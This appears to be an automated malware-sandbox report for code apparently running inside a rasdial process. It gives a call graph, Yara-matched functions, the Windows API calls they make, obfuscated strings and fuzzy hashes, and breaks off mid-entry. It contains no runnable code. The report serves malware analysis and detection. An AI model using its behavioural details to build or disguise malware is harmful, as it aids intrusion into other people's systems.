2c5f573 101528 2c5f44a 101528->101527 101529 2c5f582 101528->101529 101554 2c5f010 101528->101554 101530 2c68df0 NtClose 101529->101530 101532 2c5f58c 101530->101532 101533 2c5f486 101533->101529 101534 2c5f491 101533->101534 101535 2c6af70 RtlAllocateHeap 101534->101535 101536 2c5f4ba 101535->101536 101537 2c5f4c3 101536->101537 101538 2c5f4d9 101536->101538 101539 2c68df0 NtClose 101537->101539 101563 2c5ef00 CoInitialize 101538->101563 101541 2c5f4cd 101539->101541 101542 2c5f4e7 101566 2c688a0 101542->101566 101544 2c5f562 101545 2c68df0 NtClose 101544->101545 101546 2c5f56c 101545->101546 101547 2c6ae90 RtlFreeHeap 101546->101547 101547->101527 101548 2c5f505 101548->101544 101549 2c688a0 LdrInitializeThunk 101548->101549 101549->101548 101551 2c55db5 101550->101551 101570 2c68740 101551->101570 101555 2c5f02c 101554->101555 101556 2c53f30 LdrLoadDll 101555->101556 101558 2c5f04a 101556->101558 101557 2c5f053 101557->101533 101558->101557 101559 2c53f30 LdrLoadDll 101558->101559 101560 2c5f11e 101559->101560 101561 2c53f30 LdrLoadDll 101560->101561 101562 2c5f17b 101560->101562 101561->101562 101562->101533 101565 2c5ef65 101563->101565 101564 2c5effb CoUninitialize 101564->101542 101565->101564 101567 2c688bd 101566->101567 101575 4b62ba0 LdrInitializeThunk 101567->101575 101568 2c688ed 101568->101548 101571 2c6875a 101570->101571 101574 4b62c60 LdrInitializeThunk 101571->101574 101572 2c55e29 101572->101528 101574->101572 101575->101568 101576 2c5a730 101581 2c5a440 101576->101581 101578 2c5a73d 101595 2c5a0d0 101578->101595 101580 2c5a753 101582 2c5a465 101581->101582 101606 2c57d60 101582->101606 101585 2c5a5b0 101585->101578 101587 2c5a5c7 101587->101578 101588 2c5a5be 101588->101587 101590 2c5a6b5 101588->101590 101625 2c59b20 101588->101625 101592 2c5a71a 101590->101592 101634 2c59e90 101590->101634 101593 2c6ae90 RtlFreeHeap 101592->101593 101594 2c5a721 101593->101594 101594->101578 101596 2c5a0e3 101595->101596 101603 2c5a0ee 101595->101603 101597 2c6af70 RtlAllocateHeap 101596->101597 101597->101603 101598 2c5a10c 101598->101580 101599 2c57d60 GetFileAttributesW 101599->101603 101600 2c5a412 101601 2c5a428 101600->101601 101602 2c6ae90 RtlFreeHeap 101600->101602 101601->101580 101602->101601 101603->101598 101603->101599 101603->101600 101604 2c59b20 RtlFreeHeap 101603->101604 101605 2c59e90 RtlFreeHeap 101603->101605 101604->101603 101605->101603 101607 2c57d81 101606->101607 101608 2c57d88 GetFileAttributesW 101607->101608 101609 2c57d93 101607->101609 101608->101609 101609->101585 101610 2c62dc0 101609->101610 101611 2c62dce 101610->101611 101612 2c62dd5 101610->101612 101611->101588 101613 2c53f30 LdrLoadDll 101612->101613 101614 2c62e0a 101613->101614 101615 2c62e19 101614->101615 101638 2c62880 LdrLoadDll 101614->101638 101616 2c6af70 RtlAllocateHeap 101615->101616 101621 2c62fc7 101615->101621 101618 2c62e32 101616->101618 101619 2c62fbd 101618->101619 101618->101621 101622 2c62e4e 101618->101622 101620 2c6ae90 RtlFreeHeap 101619->101620 101619->101621 101620->101621 101621->101588 101622->101621 101623 2c6ae90 RtlFreeHeap 101622->101623 101624 2c62fb1 101623->101624 101624->101588 101626 2c59b46 101625->101626 101639 2c5d550 101626->101639 101628 2c59bbe 101630 2c59bdc 101628->101630 101631 2c59d40 101628->101631 101629 2c59d25 101629->101588 101630->101629 101644 2c599e0 101630->101644 101631->101629 101632 2c599e0 RtlFreeHeap 101631->101632 101632->101631 101635 2c59eb6 101634->101635 101636 2c5d550 RtlFreeHeap 101635->101636 101637 2c59f3d 101636->101637 101637->101590 101638->101615 101641 2c5d574 101639->101641 101640 2c5d581 101640->101628 101641->101640 101642 2c6ae90 RtlFreeHeap 101641->101642 101643 2c5d5c4 101642->101643 101643->101628 101645 2c599fd 101644->101645 101648 2c5d5e0 101645->101648 101647 2c59b03 101647->101630 101649 2c5d604 101648->101649 101650 2c5d6ae 101649->101650 101651 2c6ae90 RtlFreeHeap 101649->101651 101650->101647 101651->101650 101652 2c5fb30 101653 2c5fb4d 101652->101653 101654 2c53f30 LdrLoadDll 101653->101654 101655 2c5fb6b 101654->101655 101656 2c56b30 101657 2c56b4c 101656->101657 101665 2c56b99 101656->101665 101659 2c68df0 NtClose 101657->101659 101657->101665 101658 2c56cd1 101660 2c56b64 101659->101660 101666 2c55f10 NtClose LdrInitializeThunk LdrInitializeThunk 101660->101666 101662 2c56cab 101662->101658 101668 2c560e0 NtClose LdrInitializeThunk LdrInitializeThunk 101662->101668 101665->101658 101667 2c55f10 NtClose LdrInitializeThunk LdrInitializeThunk 101665->101667 101666->101665 101667->101662 101668->101658 101669 2c68af0 101670 2c68ba7 101669->101670 101672 2c68b1f 101669->101672 101671 2c68bbd NtCreateFile 101670->101671 101673 2c6c0b0 101674 2c6ae90 RtlFreeHeap 101673->101674 101675 2c6c0c5 101674->101675

                                                      Executed Functions

                                                      Function 02C49A00 Relevance: 21.6, Strings: 17, Instructions: 328COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 164 2c49a00-2c49c08 165 2c49c19-2c49c25 164->165 166 2c49c27-2c49c30 165->166 167 2c49c32-2c49c36 165->167 166->165 168 2c49c6e-2c49c75 167->168 169 2c49c38-2c49c6c 167->169 171 2c49c77-2c49c8d 168->171 172 2c49c9a-2c49ca1 168->172 169->167 175 2c49c8f-2c49c95 171->175 176 2c49c98 171->176 173 2c49ce7-2c49cf8 172->173 174 2c49ca3-2c49cbd 172->174 179 2c49d09-2c49d12 173->179 177 2c49cc4-2c49cc6 174->177 178 2c49cbf-2c49cc3 174->178 175->176 176->168 180 2c49cd1-2c49ce5 177->180 181 2c49cc8-2c49cce 177->181 178->177 182 2c49d14-2c49d26 179->182 183 2c49d28-2c49d2f 179->183 180->172 181->180 182->179 184 2c49d3a-2c49d41 183->184 186 2c49d80-2c49d8a 184->186 187 2c49d43-2c49d7e 184->187 188 2c49d9b-2c49da7 186->188 187->184 190 2c49dbe-2c49dc5 188->190 191 2c49da9-2c49dbc 188->191 192 2c49dcc-2c49de5 190->192 191->188 192->192 194 2c49de7-2c49df0 192->194 195 2c49df6-2c49dfd 194->195 196 2c49f63-2c49f6c 194->196 197 2c49e24-2c49e27 195->197 198 2c49dff-2c49e22 195->198 199 2c49f91-2c49f98 196->199 200 2c49f6e-2c49f8f 196->200 201 2c49e2d-2c49e34 197->201 198->195 202 2c49f9a call 2c6ab00 199->202 203 2c49fcb-2c49fd5 199->203 200->196 206 2c49e55-2c49e64 201->206 207 2c49e36-2c49e53 201->207 208 2c49f9f-2c49fa6 202->208 205 2c49fe6-2c49ff2 203->205 209 2c49ff4-2c4a003 205->209 210 2c4a005-2c4a00e 205->210 211 2c49e66-2c49e70 206->211 212 2c49e9f-2c49ea9 206->212 207->201 208->203 214 2c49fa8-2c49fbe 208->214 209->205 216 2c49e81-2c49e8a 211->216 213 2c49eba-2c49ec4 212->213 217 2c49ec6-2c49ef6 213->217 218 2c49ef8-2c49efe 213->218 219 2c49fc0-2c49fc6 214->219 220 2c49fc9 214->220 221 2c49e8c-2c49e98 216->221 222 2c49e9a 216->222 217->213 223 2c49f02-2c49f06 218->223 219->220 220->208 221->216 222->196 226 2c49f21-2c49f2b 223->226 227 2c49f08-2c49f1f 223->227 228 2c49f2d-2c49f4c 226->228 229 2c49f5e 226->229 227->223 230 2c49f5c 228->230 231 2c49f4e-2c49f56 228->231 229->194 230->226 231->230
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5R$5w$9$Ib$Q$`+$a~$m$nQ$o]5R$s:$uS$zI$zI$|K$*$e
                                                      • API String ID: 0-1284554664
                                                      • Opcode ID: 6f6d19ed633df4d8167e323aebc3b45e8cfc539ffc2e82b0dbae00823930dee8
                                                      • Instruction ID: c45cb8522d7e37abcf6bd2ecfbf577905fa6ea5c6ffb5b1b83f5c570cf986ed5
                                                      • Opcode Fuzzy Hash: 6f6d19ed633df4d8167e323aebc3b45e8cfc539ffc2e82b0dbae00823930dee8
                                                      • Instruction Fuzzy Hash: 1BF1E1B0D05229CBEB24CF45C984BEEBBB2FB84308F1085D9D119AB285CBB55A85DF44
                                                      Function 02C5BFE0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C5C0C4
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02C5C0FF
                                                      • FindClose.KERNELBASE(?), ref: 02C5C10A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 183d07411173119dccee7f1c1f1c1e8b46fa8c21f169a4b71d8de96510959e2b
                                                      • Instruction ID: 64241ca0e4f157a2a194220bc49541c23109a6bab9f729e48cd3e31d06c741dc
                                                      • Opcode Fuzzy Hash: 183d07411173119dccee7f1c1f1c1e8b46fa8c21f169a4b71d8de96510959e2b
                                                      • Instruction Fuzzy Hash: 9A319075A003187BDB20EB60CC85FFB777D9F94748F184459B908A6180DBB0AB849FA5
                                                      Function 02C68AF0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02C68BEE
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: c6fb6999348f3af72f1cc51418021961808632196b4a4eb8d88b63391d19d734
                                                      • Instruction ID: ab7ac9f5465af18cfc1a428be6c6e127ac9d8c972afbab94274fa5951bed7eb5
                                                      • Opcode Fuzzy Hash: c6fb6999348f3af72f1cc51418021961808632196b4a4eb8d88b63391d19d734
                                                      • Instruction Fuzzy Hash: B03191B5A15209AFCB14DF98D880EEEB7F9EF8C314F108219F919A7340D770A951CBA5
                                                      Function 02C68C60 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02C68D46
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: db0a028c632bf0c982bb05e8a047058077fb82843c8c03a02494181fc528af7a
                                                      • Instruction ID: a0dab1c822a45f85e3e93f5f0bea0f369ce1342b5c4b8c1976fdc0524c27c742
                                                      • Opcode Fuzzy Hash: db0a028c632bf0c982bb05e8a047058077fb82843c8c03a02494181fc528af7a
                                                      • Instruction Fuzzy Hash: D631BEB5A10208AFDB14DF98D881EEFB7F9EF8C314F148219F959A7240D670A9118BA5
                                                      Function 02C68F50 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(02C5175E,?,02C67A1F,00000000,00000004,00003000,?,?,?,?,?,02C67A1F,02C5175E,00000000,?,02C67A1F), ref: 02C69018
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: 7a32e4266d3364f5bb98c5e2f1ddbd2de5c4ba772474a9a6bbcce0c7e3460e66
                                                      • Instruction ID: 422a796213a9ab8b7900aef9e2eaef26626ddf7b7b1bd7627f8667ea241aea8a
                                                      • Opcode Fuzzy Hash: 7a32e4266d3364f5bb98c5e2f1ddbd2de5c4ba772474a9a6bbcce0c7e3460e66
                                                      • Instruction Fuzzy Hash: 822104B5A10209AFDB14DF98DC81EAFB7B9EF89310F008609FD19A7240D770A9118BA1
                                                      Function 02C68D50 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 110d16c233577d73d152ab67d92dfb61f057c6717e630057d0ac7b2722b6b0b0
                                                      • Instruction ID: 3c3f5b167deb6e691097ea96d3aaf630296bb25710a1263bf90c76fed09a0cc0
                                                      • Opcode Fuzzy Hash: 110d16c233577d73d152ab67d92dfb61f057c6717e630057d0ac7b2722b6b0b0
                                                      • Instruction Fuzzy Hash: 9F115E71611608BFD720EB68CC55FBF73ADDF89314F404609FA59A7280D7716A018BA5
                                                      Function 02C68DF0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C68E27
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 7fea8813780153429a3e2bc9ce62912ee225e97507eed709cacbc900be663fb2
                                                      • Instruction ID: d1ec627e8423481816f74f63b15ff2d9bf175a9b8f376d4905eeca214d151a5e
                                                      • Opcode Fuzzy Hash: 7fea8813780153429a3e2bc9ce62912ee225e97507eed709cacbc900be663fb2
                                                      • Instruction Fuzzy Hash: BDE08C362043047FD620EA69DC40F9B77AEEFC6764F508055FA49A7241CAB1B9018BF1
                                                      Function 04B64650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7c8ea4ccb342388f7daf3f90f62a81033258ebc6fd4d2e70990a38d77b3b8a6b
                                                      • Instruction ID: 7040be865d7837c3b15088d3924dcf30b50bb926335c7454e8c76d3eaa0983a0
                                                      • Opcode Fuzzy Hash: 7c8ea4ccb342388f7daf3f90f62a81033258ebc6fd4d2e70990a38d77b3b8a6b
                                                      • Instruction Fuzzy Hash: 34900262601500426140715848084067005DBE1305395C165A0655565C8618D9569269
                                                      Function 04B64340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 289d915853e225bdc570ed6fefaab1c509367fa7816dff4792d1796e89f6d6b2
                                                      • Instruction ID: e2c942ed9fe14355425e501f8d575bf8f6b28a530c43cba8a79290d75f89df89
                                                      • Opcode Fuzzy Hash: 289d915853e225bdc570ed6fefaab1c509367fa7816dff4792d1796e89f6d6b2
                                                      • Instruction Fuzzy Hash: D590023260580012B140715848885465005DBE0305B55C061E0525559C8A14DA575361
                                                      Function 04B62CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f0deb5c9cc28746fc74d7c3f191d6acf224ab141582e63c42141ae97a6e6e88f
                                                      • Instruction ID: 0917c9f1d81f39816f1218321fe17d56fe44b67c7eea2cb5ea59b6bdc3bce680
                                                      • Opcode Fuzzy Hash: f0deb5c9cc28746fc74d7c3f191d6acf224ab141582e63c42141ae97a6e6e88f
                                                      • Instruction Fuzzy Hash: FE90023220140402F1007598540C6461005CBE0305F55D061A512555AEC665D9926131
                                                      Function 04B62C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1b8be2571119cf27bae682e5a94d73465dced0635eb184143fda32cf265fedab
                                                      • Instruction ID: 9fd501b27058504f3e05e3ab8d98a28ed97fd796c8d29e699f252c6fa4f7ccdb
                                                      • Opcode Fuzzy Hash: 1b8be2571119cf27bae682e5a94d73465dced0635eb184143fda32cf265fedab
                                                      • Instruction Fuzzy Hash: E190023220148802F1107158840874A1005CBD0305F59C461A452565DD8695D9927121
                                                      Function 04B62C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f4c7aa27d0b79c69ac39753fd5f98e6d5b853a542808ecc235c7cb5c42a81bc6
                                                      • Instruction ID: 5585b0e2e08c6b0688efbc35589b2b99d964966de6b440e9d5c682d135c6f9c7
                                                      • Opcode Fuzzy Hash: f4c7aa27d0b79c69ac39753fd5f98e6d5b853a542808ecc235c7cb5c42a81bc6
                                                      • Instruction Fuzzy Hash: 8390023220140842F10071584408B461005CBE0305F55C066A0225659D8615D9527521
                                                      Function 04B62DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7994bec4ae000e46de7a30020bbc27cabb8bfa8f1cfcd3b06dd8410f0ab0aaab
                                                      • Instruction ID: 6a3fa5a5c3bb12822c0c6b6d27681c6915d1897d9aeb2dff71928cd6cee02fac
                                                      • Opcode Fuzzy Hash: 7994bec4ae000e46de7a30020bbc27cabb8bfa8f1cfcd3b06dd8410f0ab0aaab
                                                      • Instruction Fuzzy Hash: F190023220140413F111715845087071009CBD0245F95C462A052555DD9656DA53A121
                                                      Function 04B62DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ef02fbbf06e76cfda87501b6d9b99bffd9cc30caba5db8d13183da3f1222b25f
                                                      • Instruction ID: 34035ca6726502d48475de189882943cdea90fde3f13f35748ecf0b8bd5e4eeb
                                                      • Opcode Fuzzy Hash: ef02fbbf06e76cfda87501b6d9b99bffd9cc30caba5db8d13183da3f1222b25f
                                                      • Instruction Fuzzy Hash: 96900222242441527545B15844085075006DBE0245795C062A1515955C8526E957D621
                                                      Function 04B62D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b273575da96760063af301a1b7c5d3f8b6f5e08abf4d0a5fc5ce62638d7e1531
                                                      • Instruction ID: f8e0bf1ed829d43c9cdafb23509ee93e215f1eedd993d45294d1fc25c2528d8e
                                                      • Opcode Fuzzy Hash: b273575da96760063af301a1b7c5d3f8b6f5e08abf4d0a5fc5ce62638d7e1531
                                                      • Instruction Fuzzy Hash: 4290022230140003F1407158541C6065005DBE1305F55D061E0515559CD915D9575222
                                                      Function 04B62D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8efb0f464e82b1d153500ce1ffb41e68c7bab8999709b51ba51380ff2b0f1877
                                                      • Instruction ID: 744af915f8ba2232a4f11e8f25d9d159c04ef99d7063848c8dce8f9400d58b87
                                                      • Opcode Fuzzy Hash: 8efb0f464e82b1d153500ce1ffb41e68c7bab8999709b51ba51380ff2b0f1877
                                                      • Instruction Fuzzy Hash: 5090022A21340002F1807158540C60A1005CBD1206F95D465A011655DCC915D96A5321
                                                      Function 04B62E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2202bf2db51507a86455840be0da270acf20b0bb789ac68eb7eb802100eb0395
                                                      • Instruction ID: 8aea761cef8b4b085ec40e221486eab3ce34c926235de7a551a6d56607d83276
                                                      • Opcode Fuzzy Hash: 2202bf2db51507a86455840be0da270acf20b0bb789ac68eb7eb802100eb0395
                                                      • Instruction Fuzzy Hash: 1390022260140502F10171584408616100ACBD0245F95C072A112555AECA25DA93A131
                                                      Function 04B62EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a83202cee6aafd8d2b4fe2b9997bbb0e41cc4efc265195b8c0a2fe32a735315c
                                                      • Instruction ID: da40a24a112418fc77946778749b7e39922f1c5df1811e19c99357816f35b820
